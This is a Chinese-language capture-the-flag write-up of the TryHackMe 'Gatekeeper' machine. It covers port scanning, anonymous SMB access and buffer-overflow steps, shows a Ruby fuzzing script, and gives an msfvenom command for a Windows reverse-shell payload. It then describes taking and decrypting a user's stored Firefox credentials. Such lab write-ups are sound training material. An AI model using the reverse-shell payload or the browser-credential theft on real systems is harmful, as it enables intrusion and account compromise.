TryHackMe-Gatekeeper

靶机在线链接:Gatekeeper

0x01 信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
Host is up (0.00050s latency).
Not shown: 65524 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2020-07-03T17:01:47+00:00; -1s from scanner time.
31337/tcp open Elite?
| fingerprint-strings:
| FourOhFourRequest:
| Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
| Hello
| GenericLines:
| Hello
| Hello
| GetRequest:
| Hello GET / HTTP/1.0
| Hello
| HTTPOptions:
| Hello OPTIONS / HTTP/1.0
| Hello
| Help:
| Hello HELP
| Kerberos:
| Hello !!!
| LDAPSearchReq:
| Hello 0
| Hello
| LPDString:
| Hello
| default!!!
| RTSPRequest:
| Hello OPTIONS / RTSP/1.0
| Hello
| SIPOptions:
| Hello OPTIONS sip:nm SIP/2.0
| Hello Via: SIP/2.0/TCP nm;branch=foo
| Hello From: <sip:[email protected]>;tag=root
| Hello To: <sip:[email protected]>
| Hello Call-ID: 50000
| Hello CSeq: 42 OPTIONS
| Hello Max-Forwards: 70
| Hello Content-Length: 0
| Hello Contact: <sip:[email protected]>
| Hello Accept: application/sdp
| Hello
| SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|_ Hello
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49164/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.80%I=7%D=7/3%Time=5EFF63E0%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,24,"Hello\x20GET\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r(
SF:SIPOptions,142,"Hello\x20OPTIONS\x20sip:nm\x20SIP/2\.0\r!!!\nHello\x20V
SF:ia:\x20SIP/2\.0/TCP\x20nm;branch=foo\r!!!\nHello\x20From:\x20<sip:[email protected]
SF:>;tag=root\r!!!\nHello\x20To:\x20<sip:[email protected]>\r!!!\nHello\x20Call-ID:\
SF:x2050000\r!!!\nHello\x20CSeq:\x2042\x20OPTIONS\r!!!\nHello\x20Max-Forwa
SF:rds:\x2070\r!!!\nHello\x20Content-Length:\x200\r!!!\nHello\x20Contact:\
SF:x20<sip:[email protected]>\r!!!\nHello\x20Accept:\x20application/sdp\r!!!\nHello\x2
SF:0\r!!!\n")%r(GenericLines,16,"Hello\x20\r!!!\nHello\x20\r!!!\n")%r(HTTP
SF:Options,28,"Hello\x20OPTIONS\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")
SF:%r(RTSPRequest,28,"Hello\x20OPTIONS\x20/\x20RTSP/1\.0\r!!!\nHello\x20\r
SF:!!!\n")%r(Help,F,"Hello\x20HELP\r!!!\n")%r(SSLSessionReq,C,"Hello\x20\x
SF:16\x03!!!\n")%r(TerminalServerCookie,B,"Hello\x20\x03!!!\n")%r(TLSSessi
SF:onReq,C,"Hello\x20\x16\x03!!!\n")%r(Kerberos,A,"Hello\x20!!!\n")%r(Four
SF:OhFourRequest,47,"Hello\x20GET\x20/nice%20ports%2C/Tri%6Eity\.txt%2ebak
SF:\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r(LPDString,12,"Hello\x20\x01def
SF:ault!!!\n")%r(LDAPSearchReq,17,"Hello\x200\x84!!!\nHello\x20\x01!!!\n");
MAC Address: 02:38:CE:D7:E6:B6 (Unknown)
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 59m59s, deviation: 2h00m00s, median: -1s
|_nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:38:ce:d7:e6:b6 (unknown)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: gatekeeper
| NetBIOS computer name: GATEKEEPER\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-07-03T13:01:37-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-07-03T17:01:37
|_ start_date: 2020-07-03T16:47:56

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

smb看看有没有东西

1
2
3
4
5
6
7
8
9
10
smbclient -L 10.10.26.76
Enter WORKGROUP\kali's password:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Users Disk
SMB1 disabled -- no workgroup available

尝试匿名连接

1
2
smbclient //10.10.26.76/C$ 需要密码
smbclient //10.10.26.76/Users 允许匿名用户
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
smb: \> ls
. DR 0 Fri May 15 09:57:08 2020
.. DR 0 Fri May 15 09:57:08 2020
Default DHR 0 Tue Jul 14 15:07:31 2009
desktop.ini AHS 174 Tue Jul 14 12:54:24 2009
Share D 0 Fri May 15 09:58:07 2020
cd
7863807 blocks of size 4096. 3870864 blocks available
smb: \> cd Share
smb: \Share\> ls
. D 0 Fri May 15 09:58:07 2020
.. D 0 Fri May 15 09:58:07 2020
gatekeeper.exe A 13312 Mon Apr 20 13:27:17 2020

7863807 blocks of size 4096. 3870864 blocks available
smb: \Share\> get gatekeeper.exe
getting file \Share\gatekeeper.exe of size 13312 as gatekeeper.exe (3.6 KiloBytes/sec) (average 3.6 KiloBytes/sec)
smb: \Share\> exit

0x02 漏洞验证

下载gatekeeper.exe之后,我将它放在了Windows 10 X64位上运行,并使用ImmunityDebugger进行调试。

简单的缓冲区溢出主要分为以下步骤

  1. 模糊测试缓冲区溢出,知道输入多少个字符的时候会溢出。
  2. 用Pattern.rb生成第一步溢出获得的字符,并计算偏移量。
  3. 使用偏移量+4 看能不能手动的修改EIP的地址,如果能。那这4个字符就是EIP的值
  4. 测试ESP的大小
  5. 挑选出坏字符
  6. JMP的值为\xff\xe4,使用mona看程序本身有没有保护机制,然后找到jmp的内存地址。
  7. 生成shellcode
  8. 用能溢出的字符+JMP的内存地址+无操作字符+shellcode 填入buffer
  9. 监听端口,运行脚本

因为在Vulnhub-brainpan-1中写的已经很清楚了,和这个程序几乎一样。所以这里就不灌水了。

不过要注意:

  • Python套接字接收不到程序回来的值,所以我最后使用ruby写的。(还是菜)

给出第一步代码,接下来只需要不断修改buffer的值即可。

1
2
3
4
5
6
7
8
9
10
require 'socket'      # Sockets 是标准库

hostname = '192.168.56.3'
port = 31337

buffer = "A"*200
socket = TCPSocket.open(hostname,port) # 连接服务器
socket.puts(buffer)

socket.close # 关闭 socket

本地get_shell
get_shell

题外话

如果用python写的话,程序会先有一个保护机制。当输入一定的值后 这个保护机制才会失效,这个时候才是能够溢出的阶段。不过因为socket套接字的recv方法一直阻塞接收不到传回来的值,还是怎么的。我无法用python实现这个缓冲区溢出。如果你知道该怎么做,麻烦请告诉我,虚心学习。

0x03漏洞利用

1
msfvenom -p windows/shell_reverse_tcp LHOST=Your IP LPORT=1234 -b "\x00\x0a" -f ruby

image-20200905142823113

image-20200905143047746

image-20200905153239449

啊。。有火狐,所以可以考虑火狐获取凭证。用msf比较方便,所以我重新反弹了一个msf的shell。

image-20200905143223183

image-20200905153117498

上面这些都试过了- -全部都要64位。但是目标机器是32位的。想到

image-20200905150035085

导出之后,将这四个文件重命名会原来的名字

  • cert9.db
  • cookies.sqlite
  • Key4.db
  • Logins.json

然后再把C:\Users\natbat\AppData\Roamint\Mozilla\Firefox\Profiles文件夹也下载下来。

image-20200905153606076

最后有的文件,0 0自行忽略/tmp/下的其他的文件。再使用firefox解密的脚本

image-20200905153707946

image-20200905152422670

其实不使用msf自己把文件黏贴到samba的分享目录下也行。这四个文件都在Profiles下。

image-20200905153916141